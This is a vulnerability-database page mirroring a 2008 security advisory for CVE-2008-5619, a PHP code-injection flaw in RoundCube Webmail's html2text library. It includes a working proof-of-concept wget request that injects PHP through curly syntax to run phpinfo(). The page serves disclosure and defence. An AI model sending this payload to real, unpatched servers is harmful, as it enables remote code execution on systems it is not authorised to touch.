Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJacobo Avariento GimenoPACKETSTORM:73360
HistoryDec 30, 2008 - 12:00 a.m.

RoundCube Webmail 0.2-3 Beta Code Execution

2008-12-3000:00:00
Jacobo Avariento Gimeno
packetstormsecurity.com
28

0.886 High

EPSS

Percentile

98.4%

JSON
`  
Public Release Date of POC: 2008-12-22  
Author: Jacobo Avariento Gimeno (Sofistic)  
CVE id: CVE-2008-5619  
Bugtraq id: 32799  
Severity: Critical  
Vulnerability reported by: RealMurphy  
  
  
Intro  
----  
Roundcube Webmail is a browser-based IMAP client that uses  
"chuggnutt.com HTML to Plain Text Conversion" library to convert  
HTML text to plain text, this library uses the preg_replace PHP  
function in an insecure manner.  
  
Vulnerable versions:  
Round Cube RoundCube Webmail 0.2-3 beta  
Round Cube RoundCube Webmail 0.2-1 alpha (tested)  
  
  
Analysis of the vulnerable code  
----  
The script bin/html2text.php creates an instance of the class html2text  
with the given POST data, the problem arises in the file  
program/lib/html2text.php in function _convert() on line 381:  
  
// Run our defined search-and-replace  
$text = preg_replace($this->search, $this->replace, $text);  
  
Some patterns in $this->search allow interpret PHP code using the "e"  
flag, i.e.:  
'/<a [^>]*href=("|\')([^"\']+)\1[^>]*>(.+?)<\/a>/ie', // <a href="">  
'/<b[^>]*>(.+?)<\/b>/ie', // <b>  
'/<th[^>]*>(.+?)<\/th>/ie', // <th> and </th>  
  
In concrete those would be replaced by:  
'$this->_build_link_list("\\2", "\\3")', // <a href="">  
'strtoupper("\\1")', // <b>  
"strtoupper(\"\t\t\\1\n\")", // <th> and </th>  
  
Now using PHP complex (curly) syntax we can take advantage of this to  
interpret arbitrary PHP code, evaluating PHP code embedded inside  
strings.  
  
  
Proof of Concept  
----  
As this vulnerability was discovered in-the-wild:  
http://trac.roundcube.net/ticket/1485618 was quite sure that would be  
exploitable, using PHP curly we can execute phpinfo():  
  
wget -q --header="Content-Type: ''" \  
-O - --post-data='<b>{${phpinfo()}}</b>' \  
--no-check-certificate \  
http://127.0.0.1/roundcubemail-0.2-alpha/bin/html2text.php  
  
Using PHP curly syntax plus some tricks to bypass PHP magic_quotes_gpc  
to avoid using single or double quotes the arbitrary shell command  
execution is fully feasible. As this vulnerability was discovered last  
week no more details will be published yet, more info will be available  
at http://sofistic.net.  
  
  
  
--   
Jacobo Avariento Gimeno  
IT Security Department @ Sofistic  
Your security, our concern!  
http://sofistic.net  
`

Related

exploitpack 2
seebug 4
openvas 13
securityvulns 2
freebsd 1
packetstorm 1
ubuntucve 1
dsquare 1
nessus 5
osv 1
cve 1
debiancve 1
checkpoint_advisories 1
canvas 1
prion 1
github 1
exploitdb 2
ubuntu 1
exploitpack
exploitpack
Roundcube Webmail 0.2b - Remote Code Execution
2008-12-22 00:00:00
Roundcube Webmail 0.2-3 Beta - Code Execution
2008-12-22 00:00:00
seebug
seebug
RoundCube Webmail &lt;= 0.2-3 beta Code Execution Vulnerability
2008-12-23 00:00:00
RoundCube Webmail <= 0.2b Remote Code Execution Exploit
2014-07-01 00:00:00
RoundCube Webmail <= 0.2-3 beta Code Execution Vulnerability
2014-07-01 00:00:00
openvas
openvas
Fedora Update for roundcubemail FEDORA-2008-11234
2009-02-13 00:00:00
FreeBSD Ports: roundcube
2009-01-02 00:00:00
Fedora Update for roundcubemail FEDORA-2008-11234
2009-02-13 00:00:00
securityvulns
securityvulns
POC for CVE-2008-5619 &#40;roundcubemail PHP arbitrary code injection&#41;
2008-12-23 00:00:00
Daily web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2008-12-23 00:00:00
freebsd
freebsd
roundcube -- remote execution of arbitrary code
2008-12-12 00:00:00
packetstorm
packetstorm
RoundCube Webmail 0.2b Remote Code Execution
2008-12-30 00:00:00
ubuntucve
ubuntucve
CVE-2008-5619
2008-12-17 00:00:00
dsquare
dsquare
Roundcube 0.2beta RCE
2012-01-31 00:00:00
nessus
nessus
Fedora 9 : roundcubemail-0.2-4.beta.fc9 (2008-11234)
2008-12-15 00:00:00
Fedora 8 : roundcubemail-0.2-4.beta.fc8 (2008-11220)
2008-12-15 00:00:00
FreeBSD : roundcube -- remote execution of arbitrary code (8f483746-d45d-11dd-84ec-001fc66e7203)
2009-01-02 00:00:00
osv
osv
PHPMailer susceptible to arbitrary code execution
2022-05-14 02:39:43
cve
cve
CVE-2008-5619
2008-12-17 02:30:00
debiancve
debiancve
CVE-2008-5619
2008-12-17 02:30:00
checkpoint_advisories
checkpoint_advisories
Update Protection against Roundcubemail PHP Arbitrary Code Injection
2009-01-15 00:00:00
canvas
canvas
Immunity Canvas: ROUNDCUBE
2008-12-17 02:30:00
prion
prion
Hardcoded credentials
2008-12-17 02:30:00
github
github
PHPMailer susceptible to arbitrary code execution
2022-05-14 02:39:43
exploitdb
exploitdb
Roundcube Webmail 0.2-3 Beta - Code Execution
2008-12-22 00:00:00
Roundcube Webmail 0.2b - Remote Code Execution
2008-12-22 00:00:00
ubuntu
ubuntu
Moodle vulnerabilities
2009-06-24 00:00:00

0.886 High

EPSS

Percentile

98.4%

JSON
Related for PACKETSTORM:73360
exploitpack2seebug4openvas13securityvulns2freebsd1packetstorm1ubuntucve1dsquare1nessus5osv1cve1debiancve1checkpoint_advisories1canvas1prion1github1exploitdb2ubuntu1